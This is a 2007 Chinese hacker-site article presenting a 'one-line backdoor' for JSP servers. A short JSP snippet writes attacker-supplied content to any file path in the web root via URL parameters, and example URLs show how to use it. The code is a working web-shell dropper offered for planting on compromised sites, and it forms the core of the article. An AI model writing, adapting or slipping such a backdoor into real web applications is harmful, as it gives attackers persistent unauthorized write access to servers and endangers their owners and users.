设为首页
加入收藏
联系我们
资讯中心
软件分类
最新软件
推荐下载
热门软件
最新文章
热门文章
推荐文章
最近更新
控制面板
搜索
 
 
  专题导航
  热门文章
 
· 开机吓人的程...
· 微软GDI+图片...
· 从实战角度讨...
· 对抗启发式代...
· 黑客攻防:网...
· 合理配置服务...
· 黑客最喜欢的...
· 识别常见Web漏...
· 《商业周刊》...
· 阿根廷总统税...
  热门图文
  本月排行
 · 免费得QB 4224
  本日排行
 · 免费得QB 31
   您当前的位置:-黑客动画吧 -> 文章中心 -> 免费资源 -> 免费空间 -> 文章内容

jsp 一句话后门

作者:佚名  来源:www.hack58.net  发布时间:2007-4-25 0:32:43  发布人:noangel
 

减小字体 增大字体  

  信息来源:s0n9'5 B1o9

java是 面向对象编程的语言了! 啥都是对象!基于编译与解析之间~~-_- ... 估计没有eval execute这样功能的函数了!...但是还是可以留一句话后门的 本来我想用反射实现 像 eval这样的功能.....但是失败了!郁闷!

后来没有办法~~ 算了~~ 这样实现吧!
程序代码
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

这个 后门估计不用我说了吧! 还是提示一下咯!保存为1.jsp 提交url
http://localhost/1.jsp?f=1...&t=hello
然后
http://localhost/1.txt 就出来了 内容为 hello .....
   

[ ] [返回] [打印] [收藏]  

 
原创稿件,转载请说明出处
  相关文章
 
∷相关文章评论∷  (评论只代表网友观点,与本站立场无关!) [更多评论.]
   
 
  关于我们 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 发布软件 - 发布文章
Copyright © 2002-2005 Hack58.Com. All Rights Reserved .